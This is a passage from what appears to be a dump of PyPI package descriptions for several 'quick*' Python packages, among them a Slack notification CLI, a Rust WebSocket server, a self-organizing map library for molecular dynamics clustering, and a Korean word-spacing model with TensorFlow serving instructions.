messageqslackwatch--help\nUsage:qslackwatch[OPTIONS]COMMANDExecutecommandeveryintervalandsendmessageofexcutionoutput\n\nOptions:-n,--interavalFLOATsecondstowaitbetweenupdates-m,--mentionIfusethisflag,mentiondefaultmentionusers-s,--silentIfusethisflag,ignoreoutputelseprintoutput-b,--backgroudRunthiscommandbackgroud--helpShowthismessageandexit.The command above runs the command you enter regularly and sends the result as a message. It can be used like a watch command in linux.$ qslack watch 'sh -c \"ls | wc -l\"' -n 3\n 13\n\n 13\n\n 13This is an example of how many files in the current directory are monitored every 3 seconds to send messages in a slack.Send a message at the end of the currently running processqslack ifend --help\nUsage: qslack ifend [OPTIONS] PROCESS_ID MESSAGE\n\n Check the process is alive in every three seconds and when the process is\n dead, send message\n\n the process_id is the id of process to mornitor. Warn this command run\n python process as backgroud so can be infinitely running if the process is\n not dead.\n\nOptions:\n -m, --mention If use this flag, mention default mention users\n -n, --interaval FLOAT seconds to wait between checking liveness\n --help Show this message and exit.When you enter a pid, sends a message to the slack at the end of the running process.$ qslack ifend 18103 \"end end\"\nStart mornitoring process 18103...\n\n[+] QuickSlack: Process 18623 end\n[+] QuickSlack: Sent messageBecause it runs as background, if the process does not shut down for a long time, the qslack command remains running.Usage in python$python3Python3.7.3(v3.7.3:ef4ec6ed12,Mar252019,16:52:21)[Clang6.0(clang-600.0.57)]ondarwinType\"help\",\"copyright\",\"credits\"or\"license\"formoreinformation.>>>fromquick_slack.low_apiimportsend_message>>>send_message(\"hihi\",mention=True){'ok':True,'channel':'CCCCCCCCCCC','ts':'1609145740.013500','message':{'bot_id':'BBBBBBBBB','type':'message','text':'<@UUUUUUU> \\nhihi','user':'U01GEA37VL1','ts':'1609145740.013500','team':'TTTTTTTTTT','bot_profile':{'id':'BBBBBBBB','deleted':False,'name':'Slack CLI','updated':1606963748,'app_id':'AAAAAAAAAA','icons':{},'team_id':'TTTTTTTTTT'}},'warning':'missing_charset','response_metadata':{'warnings':['missing_charset']}}>>>You can also use quick_slack in Python as above."} +{"package": "quickslice", "pacakge-description": "No description available on PyPI."} +{"package": "quickSms", "pacakge-description": "
Welcome to quickSms!  This is a quickSms applicaion can be used from CLI from unix system===================================================================How to use thsi application1. sms 8147830733 Hi I am Dipankar2. sms -s 160by2 8147830733 Hi! Dipankar again !3. sms -s way2sms -m 8147830733 -t Yes ! Dipankar Again!!Use: -h / --help to get help---------------------------------------Author : Dipankar DuttaEmail : dutta.dipankar08@gmail.com---------------------------------------
"} +{"package": "quicksocket", "pacakge-description": "quicksocketA simple WebSocket server built in Rust usingtokio,tokio-tungstenite, andpyo3. Supports Windows, macOS, and Linux. Still unstable!pipinstallquicksocketCheck out example-usage/quicksocket_with_types.py for an example of a wrapper WebsocketServer class around the quicksocket API and also provides type annotations for e.g. autocompletion in your IDE.Not stable, a bit verbose, and a bit messy!The server listens for WebSocket connections on port50808, and currently this is not configurable. (see src/server/tokio_server.rs).quicksocket's code is originally designed for use with Ultraleap's Web Visualizer project, and as such is intended for a console python visualizer server and leverages plainprintln!s for logging purposes.At some point in the future it'll make sense to switch to some proper env logging system. Pardon the mess :)Building LocallyYou'll needRustand access to some python.exe of version 3.6 or greater.You'll also need OpenSSL. See the Ubuntu section for installation details on Ubuntu. OpenSSL is slightly trickier for Windows. You can use Chocolatey or vcpkg, or download a binary distribution of OpenSSL. You may need to set$Env:OPENSSL_DIR(PowerShell syntax) to your installation directory for your Windows build session if using Chocolatey, or a binary install, or if vcpkg isn't activated for your session. macOS should have it by default.Once Rust is installed:cargobuild--releaseThis will output an .so or a .pyd depending on your OS into thetarget/releasedirectory.To build a wheel for your python/OS combo:pipinstallmaturin\nmaturinbuildThere's CI for Windows, macOS, and Linux for Pythons 3.6 through 3.9. Check out the Actions tab for now (proper release tags coming \"soon\").Targeting builds to specific Python versionsIf you're targeting a specific python version, or if you don't have python on your PATH, you can setPYTHON_SYS_EXECUTABLEto the python executable in your machine with that version.e.g., on Windows via Git Bash:PYTHON_SYS_EXECUTABLE=/c/my/path/to/python.execargobuild--releaseUbuntuMake sure you have libssl and libpython installed:sudoapt-getinstalllibssl-dev\nsudoapt-getinstalllibpython3-devIf you encounter errors buildingpyo3, you may need to check whether it can find your python and any related python dev dependencies:https://pyo3.rs/v0.10.1/building_and_distribution.htmlTodos:Little utility HTML via github pagesCould expose this through Github Pages so it's easy for a new user to test their server usage:https://github.com/nickjbenson/quicksocket/blob/main/archive/examples/wip01_basic_websocket_client.html"} +{"package": "quicksom", "pacakge-description": "Self-Organizing MapPyTorch implementation of a Self-Organizing Map. The implementation makes possible the use of a GPU if available for\nfaster computations. It follows the scikit package semantics for training and usage of the model. It also includes\nrunnable scripts to avoid coding.Example of a MD clustering usingquicksom:Requirements and setupThe SOM object requires PyTorch installed.It has dependencies in numpy, scipy and scikit-learn and scikit-image. The MD application requires pymol to load the\ntrajectory that is not included in the dependenciesTo set up the project, we suggest using conda environments. InstallPyTorchand run :pip install quicksomSOM object interfaceThe SOM object can be created using any grid size, with a optional periodic topology. One can also choose optimization\nparameters such as the number of epochs to train or the batch sizeTo use it, we include three scripts to :fit a SOMto optionally build the clusters manually with a guito predict cluster affectations for new data points$ quicksom_fit -h\n\nusage: quicksom_fit [-h] [-i IN_NAME] [--pdb PDB] [--select SELECT]\n [--select_align SELECT_ALIGN] [-o OUT_NAME] [-m M] [-n N]\n [--periodic] [-j] [--n_epoch N_EPOCH]\n [--batch_size BATCH_SIZE] [--num_workers NUM_WORKERS]\n [--alpha ALPHA] [--sigma SIGMA] [--scheduler SCHEDULER]\n\noptional arguments:\n -h, --help show this help message and exit\n -i IN_NAME, --in_name IN_NAME\n Can be either a .npy file or a .dcd molecular dynamics\n trajectory. If you are providing a .dcd file, you\n should also provide a PDB and optional selections.\n --pdb PDB (optional) If using directly a dcd file, we need to add a PDB for\n selection\n --select SELECT (optional)\n Atoms to select\n --select_align SELECT_ALIGN (optional)\n Atoms to select for structural alignment\n -o OUT_NAME, --out_name OUT_NAME\n name of pickle to dump\n -m M, --m M The width of the som\n -n N, --n N The height of the som\n --periodic if set, periodic topology is used\n -j, --jax To use the jax version\n --n_epoch N_EPOCH The number of iterations\n --batch_size BATCH_SIZE (optional)\n The batch size to use\n --num_workers NUM_WORKERS (optional)\n The number of workers to use\n --alpha ALPHA (optional)\n The initial learning rate\n --sigma SIGMA (optional)\n The initial sigma for the convolution\n --scheduler SCHEDULER (optional)\n Which scheduler to use, can be linear, exp or halfYou can also use the following two scripts to use your trained SOM.$ quicksom_gui -h\n$ quicksom_predict -hThe SOM object is also importable from python scripts to use directly in your analysis pipelines :importnumpyfromquicksom.somimportSOM# Get dataX=numpy.load('contact_desc.npy')# Create SOM object and train it, then dump it as a pickle objectm,n=100,100dim=X.shape[1]n_epoch=5batch_size=100som=SOM(m,n,dim,n_epoch=n_epoch)learning_error=som.fit(X,batch_size=batch_size)som.save_pickle('som.p')# Usage on the input data, predicted_clusts is an array of length n_samples with clusters affectationssom.load_pickle('som.p')predicted_clusts,errors=som.predict_cluster(X)Using JAXJAXis an efficient array computation library\nthat enables just-in-time (jit) compilation of functions.\nWe recently enabled jax support for our tool. Jax accelerated SOM usage\nwas reported torun twice faster than using the torch backend.JAX can be installed followingthese steps.\nThen the tools usually expose a -j option to use the JAX backend.\nFor instance, try running :quicksom_fit -i data/2lj5.npy -jWe have kept a common interface for most of the function calls. You should\nnot have to adapt your scripts too much, except for the device management that\nhas a different syntax in JAX. For examples, look at the executable scripts.\nTo use JAX from your scripts, simply change the import in the following manner.# Classic import, to use the torch backend\nfrom quicksom.som import SOM\n# Jax import\nfrom quicksom.somax import SOMSOM training on molecular dynamics (MD) trajectoriesScripts and extra dependencies:To deal with trajectories, we use the following new libraries :Pymol,pymol-psico,MDAnalysis.\nTo set up these dependencies using conda, just type :conda install -c schrodinger pymol pymol-psico\npip install MDAnalysisFitting a SOM to an MD trajectoryIn MD trajectories, all atoms including solvant can be present, making\nthe coordinates in each frame unnecessary big and impractical. We offer\nthe possibility to only keep the relevant indices using a pymol selection,\nfor instance--select name CA. Moreover, before clustering the conformations,\nwe need to align them.Approach 1 :We used to rely on a two step process to fit a SOM to a trajectory :Create a npy file with aligned atomic coordinates of C-alpha, using an utility script :dcd2npyFit the SOM as above using this npy file.Approach 2 :In our new version of the SOM, we skip the intermediary step\nand rely on PyTorch efficient multiprocess data loading to align the data\non the fly. Moreover this approach scales to trajectories that don't fit in memory.\nIt is now the recommended approach.The two alternative sets of following commands can be applied for a MD clustering :$ quicksom_fit -i data/2lj5.dcd --pdb data/2lj5.pdb --select 'name CA' -o data/som_2lj5.p --n_iter 100 --batch_size 50 --periodic --alpha 0.5\nOR USE THE TWO-STEP PROCESS\n$ dcd2npy --pdb data/2lj5.pdb --dcd data/2lj5.dcd --select 'name CA'\n$ quicksom_fit -i data/2lj5.npy -o data/som_2lj5.p --n_iter 100 --batch_size 50 --periodic --alpha 0.5\n\n1/100: 50/301 | alpha: 0.500000 | sigma: 25.000000 | error: 397.090729 | time 0.387760\n4/100: 150/301 | alpha: 0.483333 | sigma: 24.166667 | error: 8.836357 | time 5.738029\n7/100: 250/301 | alpha: 0.466667 | sigma: 23.333333 | error: 8.722509 | time 11.213565\n[...]\n91/100: 50/301 | alpha: 0.050000 | sigma: 2.500000 | error: 5.658005 | time 137.348755\n94/100: 150/301 | alpha: 0.033333 | sigma: 1.666667 | error: 5.373021 | time 142.033695\n97/100: 250/301 | alpha: 0.016667 | sigma: 0.833333 | error: 5.855451 | time 147.203326Analysis and clustering of the map usingquicksom_gui:quicksom_gui-idata/som_2lj5.pAnalysis of MD trajectories with this SOMWe now have a trained SOM and we can use several functionalities such as clustering input data points and grouping them\ninto separate dcd files, creating a dcd with one centroid per fram or plotting of the U-Matrix and its flow.Cluster assignment of input data points:quicksom_predict-idata/2lj5.npy-odata/2lj5-sdata/som_2lj5.pThis command generates 3 files:$ ls data/2lj5_*.txt\n\ndata/2lj5_bmus.txt\ndata/2lj5_clusters.txt\ndata/2lj5_codebook.txtcontaining the data:Best Matching Unit with error for each data point - Cluster assignment - Assignment for each SOM cell of the closest\ndata point (BMU with minimal error).-1means no assignment$ head -3 data/2lj5_bmus.txt\n\n38.0000 36.0000 4.9054\n37.0000 47.0000 4.6754\n2.0000 27.0000 7.0854$ head -3 data/2lj5_clusters.txt\n\n4 9 22 27 28 32 39 43 44 45 46 48 75 77 78 92 94 98 102 119 126 127 142 147 153 154 162 171 172 180 185 189 190 191 197 206 218 223 226 227 235 245 255 265 285 286 292 299\n3 5 7 10 14 21 23 26 29 33 37 51 54 55 63 64 70 74 80 82 83 84 85 86 88 99 103 104 106 107 108 116 121 123 129 131 132 133 139 140 146 148 150 155 159 161 163 165 170 173 179 181 183 200 209 214 217 220 221 228 229 231 237 239 240 241 247 248 250 251 256 258 260 267 275 277 278 279 287 291 293 296 297 301\n1 2 8 11 12 13 15 17 18 19 20 24 25 30 31 35 38 41 42 50 52 56 58 60 61 62 65 66 68 69 71 72 73 79 87 89 90 91 93 95 96 97 101 105 109 110 112 113 114 118 120 122 124 125 130 134 136 137 138 141 143 144 145 151 152 156 157 158 160 166 168 169 174 175 176 177 178 184 187 188 193 195 201 205 208 210 211 212 213 215 216 222 225 230 232 233 234 236 242 244 246 249 252 253 254 259 261 262 264 266 268 270 271 272 274 276 280 282 283 284 288 289 290 295 298 300Cluster extractions from the inputdcdusing thequicksom_extracttool:$ quicksom_extract -h\n\nExtract clusters from a dcd file\n quicksom_extract -p pdb_file -t dcd_file -c cluster_filequicksom_extract-pdata/2lj5.pdb-tdata/2lj5.dcd-cdata/2lj5_clusters.txt$ ls -v data/cluster_*.dcd\n\ndata/cluster_1.dcd\ndata/cluster_2.dcd\ndata/cluster_3.dcd\ndata/cluster_4.dcdExtraction of the SOM centroids from the inputdcdgrep-v\"\\-1\"data/2lj5_codebook.txt>_codebook.txt\nmdx--topdata/2lj5.pdb--trajdata/2lj5.dcd--fframes_codebook.txt--outdata/centroids.dcd\nrm_codebook.txtPlotting the U-matrix:python3-c'import pickleimport matplotlib.pyplot as pltsom=pickle.load(open(\"data/som_2lj5.p\", \"rb\"))plt.matshow(som.umat)plt.savefig(\"data/umat_2lj5.png\")'Flow analysisThe flow of the trajectory can be projected onto the U-matrix using the following command:$ quicksom_flow -h\n\nusage: quicksom_flow [-h] [-s SOM_NAME] [-b BMUS] [-n] [-m] [--stride STRIDE]\n\nPlot flow for time serie clustering.\n\noptional arguments:\n -h, --help show this help message and exit\n -s SOM_NAME, --som_name SOM_NAME\n name of the SOM pickle to load\n -b BMUS, --bmus BMUS BMU file to plot\n -n, --norm Normalize flow as unit vectors\n -m, --mean Average the flow by the number of structure per SOM\n cell\n --stride STRIDE Stride of the vectors fieldWith this toy example, we get the following plot:Data projection$ quicksom_project -h\n\nusage: quicksom_project [-h] [-s SOM_NAME] [-b BMUS] -d DATA\n\nPlot flow for time serie clustering.\n\noptional arguments:\n -h, --help show this help message and exit\n -s SOM_NAME, --som_name SOM_NAME\n name of the SOM pickle to load\n -b BMUS, --bmus BMUS BMU file to plot\n -d DATA, --data DATA Data file to projectMiscellaneousIf you run into any bug or would like to ask for a functionnality, feel\nfree to open an issue or reach out by mail.If this work is of use to you, it was published as an Application Note in\nBioinformatics. You can use the following bibtex :@article{mallet2021quicksom,\n title={quicksom: Self-Organizing Maps on GPUs for clustering of molecular dynamics trajectories},\n author={Mallet, Vincent and Nilges, Michael and Bouvier, Guillaume},\n journal={Bioinformatics},\n volume={37},\n number={14},\n pages={2064--2065},\n year={2021},\n publisher={Oxford University Press}\n}"} +{"package": "quicksong", "pacakge-description": "## quicksongThis is a very basic program for detecting birdsong in long recordings that may be contaminated with cage noise. It uses the same general principle employed widely in the birdsong community, but instead of having to manually tweak thresholds, a support vector machine classifier is trained using manually labeled data."} +{"package": "quickspacer", "pacakge-description": "QuickSpacer\ube60\ub978 \uc18d\ub3c4\uc640 \uc900\uc218\ud55c \uc815\ud655\ub3c4\ub97c \ubaa9\ud45c\ub85c\ud558\ub294 \ud55c\uad6d\uc5b4 \ub744\uc5b4\uc4f0\uae30 \uad50\uc815 \ubaa8\ub378\uc785\ub2c8\ub2e4.\uc774 \ub808\ud3ec\uc9c0\ud1a0\ub9ac\uc5d0 \uc788\ub294 \ubaa8\ub378\ub4e4\uc740\ubaa8\ub450\uc758 \ub9d0\ubb49\uce58\uad6d\ub9bd\uad6d\uc5b4\uc6d0 \ubb38\uc5b4 \ub9d0\ubb49\uce58(\ubc84\uc804 1.0)\ub370\uc774\ud130\ub97c \uc774\uc6a9\ud558\uc5ec \ud559\uc2b5\ud55c \ubaa8\ub378\uc785\ub2c8\ub2e4.Demo\ub370\ubaa8\ub294 Tensorflow JS\ub85c \ub9cc\ub4e4\uc5b4\uc838 \uc788\uc73c\uba70https://psj8252.github.io/quickspacer/\uc5d0\uc11c \uc0ac\uc6a9\ud574\ubcf4\uc2e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Install & Usagepipinstallquickspacer\uc704 \uba85\ub839\uc5b4\ub85c \uc124\uce58\ud558\uc2e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.fromquickspacerimportSpacerspacer=Spacer()spacer.space([\"\ub744\uc5b4\uc4f0\uae30\ub97c\uc548\ud55c\ub098\uc05c\ub9d0\",\"\ub610\ub294 \ub744\uc5b4\uc4f0\uae30\uac00 \uc798 \ub418\uc5b4\uc788\ub294 \uc88b\uc740 \ub9d0\"])spacer.space([\"\ub744\uc5b4\uc4f0\uae30\ub97c\uc548\ud55c\ub098\uc05c\ub9d0\",\"\ub610\ub294 \ub744\uc5b4\uc4f0\uae30\uac00 \uc798 \ub418\uc5b4\uc788\ub294 \uc88b\uc740 \ub9d0\",...],batch_size=48)\uc774\ub7f0\uc2dd\uc73c\ub85c \uc0ac\uc6a9\ud558\uc2e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4. spacer.space() \ud568\uc218\ub294 \ub744\uc5b4\uc4f0\uae30\uac00 \ub41c \ub9ac\uc2a4\ud2b8\ub97c \ubc18\ud658\ud569\ub2c8\ub2e4.batch_size\uc635\uc158\uc744 \uc0ac\uc6a9\ud558\uba74 batch\ub2e8\uc704\ub85c \ubb36\uc5ec \uc5f0\uc0b0\ud569\ub2c8\ub2e4.\nbatch\ub0b4\uc5d0 \uc788\ub294 \ubb38\uc7a5\ub4e4\uc740 \uac00\uc7a5 \uae34 \ubb38\uc7a5\uae38\uc774\ub97c \uae30\uc900\uc73c\ub85c \ub098\uba38\uc9c0 \ubb38\uc7a5\uc740 padding\ud558\uc5ec \uc5f0\uc0b0\uc744 \uc9c4\ud589\ud558\ubbc0\ub85c batch_size\uac00 \ub108\ubb34 \ud06c\uace0 \uae38\uc774\uac00 \uc5c4\uccad \uae34 \ubb38\uc7a5\uc774 \ub4e4\uc5b4\uc788\ub2e4\uba74 \uc804\uccb4 \ucd94\ub860 \uc18d\ub3c4\uac00 \ub290\ub824\uc9c8 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\nbatch_size\ub97c \ub530\ub85c \ub118\uae30\uc9c0 \uc54a\uc73c\uba74 \uc785\ub825 \ub370\uc774\ud130 \uc804\uccb4\ub97c \ud55c \ubc88\uc5d0 \uacc4\uc0b0\ud569\ub2c8\ub2e4.fromquickspacerimportSpacerspacer=Spacer(\"somewhere/my_custom_savedmodel_dir\")spacer=Spacer(saved_model_dir=\"somewhere/my_custom_savedmodel_dir\")\ub9cc\uc57d \ubaa8\ub378\uc744 \ub530\ub85c \ud559\uc2b5\uc2dc\ud0a4\uc168\ub2e4\uba74, \uc704\uc640 \uac19\uc774 saved_model \uacbd\ub85c\ub97c \uc778\uc790\ub85c \ub118\uaca8 \uc9c1\uc811\ud559\uc2b5\ud55c \ubaa8\ub378\uc744 \uc0ac\uc6a9\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\ubb3c\ub860 savedmodel\uc774 \ub808\ud3ec\uc9c0\ud1a0\ub9ac\uc758 scripts.convert_to_savedmodel \uc2a4\ud06c\ub9bd\ud2b8\ub97c \ud1b5\ud574 \ubcc0\ud658\ub41c \uacbd\uc6b0\ub9cc \uac00\ub2a5\ud569\ub2c8\ub2e4.fromquickspacerimportSpacer# Level 1 Default, Same as Spacer()spacer1=Spacer(level=1)# Level 2spacer2=Spacer(level=2)# Level 3spacer1=Spacer(level=3)Spacer\uc758 \uc778\uc2a4\ud134\uc2a4\ub97c \ub9cc\ub4e4 \ub54c \uc704\uc640 \uac19\uc774 level \uc778\uc790\ub97c \ub118\uaca8\uc904 \uc218 \uc788\uc2b5\ub2c8\ub2e4. (\uae30\ubcf8: 1) \ub808\ubca8\uc740 \ub192\uc744\uc218\ub85d \uc77c\ubc18\uc801\uc778 \ub744\uc5b4\uc4f0\uae30 \uc131\ub2a5\uc774 \ud5a5\uc0c1\ub418\uba70 \ub300\uc2e0 \uc18d\ub3c4\uac00 \ub354 \uc624\ub798\uac78\ub9bd\ub2c8\ub2e4.TrainMake Vocabpython-mscripts.make_vocab\\--input-dir[corpus_directory_path]\\--vocab-path[vocab_file_path]\uae30\ubcf8 vocab\uc740 quickspacer/resources/vocab.txt\uc5d0 \uc874\uc7ac\ud558\uc9c0\ub9cc \ub530\ub85c \ubb38\uc790\uc5f4\uc774 \ud544\uc694\ud558\uac70\ub098 \ub2e4\ub978 \uc5b8\uc5b4\uc758 \ub744\uc5b4\uc4f0\uae30 \ubaa8\ub378\uc744 \ub9cc\ub4e4 \uc608\uc815\uc774\ub77c\uba74 \uc704 \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \uc0c8\ub85c vocab \ud30c\uc77c\uc744 \ub9cc\ub4e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Model Trainpython-mscripts.train_quickspacer\\--model-name[model_name]\\--dataset-file-path[dataset_paths]\\--output-path[output_dir_path]\ubaa8\ub378\uc740 \uc704 \uba85\ub839\uc5b4\ub85c \ud559\uc2b5\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\ud604\uc7ac \ub808\ud3ec\uc9c0\ud1a0\ub9ac\uc5d0 \uc874\uc7ac\ud558\ub294 \ubaa8\ub378\uc740 [ConvSpacer1, ConvSpacer2, ConvSpacer3] \uc138 \uc885\ub958\uc785\ub2c8\ub2e4. model-name\uc5d0\ub294 \uc774 \uc138 \uac00\uc9c0 \uc911 \ud558\ub098\ub97c \uc785\ub825\ud569\ub2c8\ub2e4.\uac01 \ubaa8\ub378\ub9c8\ub2e4 \uc0ac\uc6a9\ud558\ub294 \ud30c\ub77c\ubbf8\ud130\uac00 \uc788\ub294\ub370 configs \ub514\ub809\ud1a0\ub9ac\uc5d0 \uae30\ubcf8 \uc124\uc815\ud30c\uc77c\ub4e4\uc774 \uc788\uc73c\uba70 \uc774\ub97c \uc218\uc815\ud574\uc11c \uc0ac\uc6a9\ud558\uba74 \ub429\ub2c8\ub2e4.dataset\uc740 UTF-8\ub85c \uc778\ucf54\ub529 \ub41c \ud14d\uc2a4\ud2b8\ud30c\uc77c \ud615\ud0dc\uc785\ub2c8\ub2e4. \ub744\uc5b4\uc4f0\uae30\uac00 \uc62c\ubc14\ub974\uac8c \ub418\uc5b4\uc788\ub294 \ubb38\uc7a5\uc774\ub77c\uace0 \uac00\uc815\ud558\uace0 \ud559\uc2b5\ud569\ub2c8\ub2e4. \uc5ec\ub7ec \ud30c\uc77c\uc744 \uc785\ub825\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4. ex) \"corpus_*.txt\"python-mscripts.train_quickspacer--help\ub97c \ubcf4\uba74 \uc5ec\ub7ec \ud559\uc2b5 parameter\uc744 \uc785\ub825\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Deploy\ubc30\ud3ec\ub294 SavedModel\uc744 \uc774\uc6a9\ud55c \ubc30\ud3ec\uc640 Tensorflowjs\ub97c \uc774\uc6a9\ud55c \ubc30\ud3ec\uac00 \uac00\ub2a5\ud569\ub2c8\ub2e4.Deploy using SavedModelMake SavedModelpython-mscripts.convert_to_savedmodel\\--model-weight-path[model_weight_path]\\--output-path[saved_model_path]\uc704 \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \ubaa8\ub378\uc744 TF SavedModel \ud615\uc2dd\uc73c\ub85c \ubcc0\ud658\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.model-weight-path\ub294 train\uc744 \ud1b5\ud574\uc11c models\uc5d0 \uc800\uc7a5\ub41c \uacbd\ub85c\ub97c \uc785\ub825\ud558\uba74 \ub418\ub294\ub370 \"spacer-XXepoch-xxx.index\" \uc774\ub7f0 \uc2dd\uc73c\ub85c \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\ub294\ub370 \"spacer-XXepoch-xxx\" \uae4c\uc9c0\ub9cc \uc785\ub825\ud569\ub2c8\ub2e4.SavedModel\uc740 \uadf8\ub300\ub85c Tensorflow\ub85c Load\ud574\uc11c \uadf8\ub300\ub85c \uc0ac\uc6a9\ud574\ub3c4 \ub418\uace0, Tensorflow serving \ub4f1\uc744 \ud1b5\ud574 API \uc11c\ubc84\ub85c Deploy\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.SavedModel Additional Descriptionconvert_to_savedmodel\ub85c \ubcc0\ud658\ud55c \ubaa8\ub378\uc740 \ub450 \uac1c\uc758 signature function\uc744 \uac00\uc9c0\uace0 \uc788\uc2b5\ub2c8\ub2e4. \uc544\ub798 \uba85\ub839\ub4e4\uc740 SavedModel\uc744 \ub9cc\ub4dc\ub294 \uac83\uacfc\ub294 \ubb34\uad00\ud558\uba70 \ucd94\uac00\uc801\uc778 \uc124\uba85\uc744 \uc704\ud55c \uac83\uc785\ub2c8\ub2e4.$saved_model_clishow--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defserving_default2020-11-1517:02:30.861944:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcudart.so.10.1\nThegivenSavedModelSignatureDefcontainsthefollowinginput(s):inputs['texts']tensor_info:dtype:DT_STRINGshape:(-1)name:serving_default_texts:0\nThegivenSavedModelSignatureDefcontainsthefollowingoutput(s):outputs['spaced_sentences']tensor_info:dtype:DT_STRINGshape:unknown_rankname:StatefulPartitionedCall_1:0\nMethodnameis:tensorflow/serving/predictdefault\ub294 text\ub97c \uc785\ub825\ubc1b\uace0 \ub744\uc5b4\uc4f0\uae30\uac00 \uc644\ub8cc\ub41c \ubb38\uc7a5\uc744 \ubc18\ud658\ud558\ub3c4\ub85d \ub418\uc5b4\uc788\uc2b5\ub2c8\ub2e4. \uc704\uc758 saved_model_cli\ub97c \ud1b5\ud574 \uc0b4\ud3b4\ubcf4\uba74 DT_STRING\uc774 \uc785\ucd9c\ub825\uc778 \uac83\uc744 \uc54c \uc218 \uc788\uc2b5\ub2c8\ub2e4.$saved_model_clirun--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defserving_default\\--input_exprs'texts=[\"\uadfc\ub370\uc774\uac83\uc880\ub744\uc6cc\uc8fc\uc2dc\uaca0\uc5b4\uc694?\", \"\uc2eb\uc740\ub370\uc601\u314e\u314e\"]'2020-11-1517:06:27.735637:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcudart.so.10.12020-11-1517:06:28.659347:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcuda.so.1[\uac01\uc885TFlog\ub4e4...]Resultforoutputkeyspaced_sentences:[b'\\xea\\xb7\\xbc\\xeb\\x8d\\xb0 \\xec\\x9d\\xb4\\xea\\xb2\\x83 \\xec\\xa2\\x80 \\xeb\\x9d\\x84\\xec\\x9b\\x8c \\xec\\xa3\\xbc\\xec\\x8b\\x9c\\xea\\xb2\\xa0\\xec\\x96\\xb4\\xec\\x9a\\x94?'b'\\xec\\x8b\\xab\\xec\\x9d\\x80\\xeb\\x8d\\xb0 \\xec\\x98\\x81\\xe3\\x85\\x8e\\xe3\\x85\\x8e']\uc774\ub7f0 \uc2dd\uc73c\ub85c saved_model\uc774 \uc798 \uc800\uc7a5\ub418\uc5c8\uace0 \uc81c\ub300\ub85c \ub3d9\uc791\ud558\ub294\uc9c0 \ud655\uc778\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.Unicode \ubc14\uc774\ub108\ub9ac\ub85c \ub098\uc640\uc11c \uc870\uae08 \ubd88\ud3b8\ud55c\ub370 \ud55c\uae00\ub85c \ubc14\uafd4\ubcf4\uba74 [\"\uadfc\ub370 \uc774\uac83 \uc880 \ub744\uc6cc \uc8fc\uc2dc\uaca0\uc5b4\uc694?\",\"\uc2eb\uc740\ub370 \uc601\u314e\u314e\"] \uc73c\ub85c \ub744\uc5b4\uc4f0\uae30\ub97c \ud574\uc8fc\uc5c8\uc2b5\ub2c8\ub2e4.$saved_model_clishow--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defmodel_inference2020-11-1517:03:19.988061:Itensorflow/stream_executor/platform/default/dso_loader.cc:48]Successfullyopeneddynamiclibrarylibcudart.so.10.1\nThegivenSavedModelSignatureDefcontainsthefollowinginput(s):inputs['tokens']tensor_info:dtype:DT_INT32shape:(-1,-1)name:model_inference_tokens:0\nThegivenSavedModelSignatureDefcontainsthefollowingoutput(s):outputs['output_0']tensor_info:dtype:DT_FLOATshape:(-1,-1)name:StatefulPartitionedCall:0\nMethodnameis:tensorflow/serving/predict\ub610 \ud558\ub098\uc758 Signature \ud568\uc218\ub294 \ubb38\uc7a5\uc744 \uae00\uc790\ub97c \ub2e4 \uc798\ub77c\uc11c Vocab\uc744 \uc774\uc6a9\ud574 \uc22b\uc790\ub85c \ubcc0\ud658\ub41c \uc785\ub825\uc744 \ubc1b\uace0, \uac01 \uc790\ub9ac\ub97c \ub744\uc6cc\uc57c\ud560 \ud655\ub960\uc744 \uc54c\ub824\uc90d\ub2c8\ub2e4.\uc544\uae4c\uc640 \uac19\uc740 \ubb38\uc7a5\uc744 \uc22b\uc790\ub85c \ubcc0\ud658\ud558\uc5ec \ud14c\uc2a4\ud2b8\ud574\ubcf4\uaca0\uc2b5\ub2c8\ub2e4.$saved_model_clirun--dirsaved_spacer_model/1\\--tag_setserve\\--signature_defmodel_inference\\--input_exprs'tokens=[[88,26,4,100,112,1241,93,64,38,56, 6,19,15],[216,33,26,202,67,67,0,0,0,0,0,0,0]]'[\uac01\uc885Tensorflowlog...]Resultforoutputkeyoutput_0:[[2.5608379e-039.8520654e-011.2721949e-039.7731644e-019.9997485e-011.6742251e-075.0763595e-012.1732522e-031.0649196e-032.6994228e-041.1066308e-041.4717710e-032.8897190e-01][3.6909140e-041.2601367e-028.4685940e-017.0986725e-061.3404434e-055.6068022e-102.8169470e-121.1617506e-172.8605146e-172.8605146e-172.8605146e-175.3611558e-162.1768996e-07]]\ub450 \ubb38\uc7a5\uc758 \uae38\uc774\uac00 \ub2e4\ub978 \uacbd\uc6b0\uc5d0\ub294 \uc704 \uc608\uc2dc\ucc98\ub7fc 0\uc73c\ub85c \ud328\ub529\uc744 \ud574\uc918\uc57c\ud569\ub2c8\ub2e4.\uacb0\uacfc\ub97c \ubcf4\uba74 \uac01 \uc704\uce58\ub9c8\ub2e4 \ub744\uc5b4\uc57c\ud560 \ud655\ub960\uc774 \ub098\uc654\uc2b5\ub2c8\ub2e4.Deploy using Tensorflow/serving docker$dockerrun--rm--nametest-p8500:8500-p8501:8501\\--mounttype=bind,source=`pwd`/saved_spacer_model,target=/models/spacer\\-eMODEL_NAME=spacer\\-ttensorflow/serving:latest\uac04\ub2e8\ud788 docker\ub85c tensorflow serving \uc11c\ubc84\ub97c \uc5ec\ub294 \uba85\ub839\uc785\ub2c8\ub2e4. 